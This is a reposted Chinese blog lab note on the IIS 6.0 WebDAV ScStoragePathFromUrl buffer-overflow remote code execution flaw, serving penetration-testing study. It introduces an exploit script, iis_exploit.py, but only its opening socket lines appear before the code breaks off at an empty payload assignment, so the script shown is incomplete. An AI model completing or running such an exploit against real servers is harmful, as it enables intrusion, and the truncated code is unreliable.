2021-08-27 网安实验-Windows系统渗透测试之IIS6.0远程代码执行0day漏洞

举报
愚公搬代码 发表于 2021/10/19 23:21:49 2021/10/19
【摘要】 漏洞复现 此漏洞由于WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞攻击者可以构造恶意请求达到任意代码执行,所以IIS6.0需要开启WebDAV服务才可以成功利用 ii...

漏洞复现

此漏洞由于WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞攻击者可以构造恶意请求达到任意代码执行,所以IIS6.0需要开启WebDAV服务才可以成功利用

iis_exploit.py攻击脚本代码如下:

import socket  
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
sock.connect(('127.0.0.1',80))  
pay=
  
 
  • 1
  • 2
  • 3

文章来源: codeboy.blog.csdn.net,作者:愚公搬代码,版权归原作者所有,如需转载,请联系作者。

原文链接:codeboy.blog.csdn.net/article/details/119945373

【版权声明】本文为华为云社区用户转载文章,如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。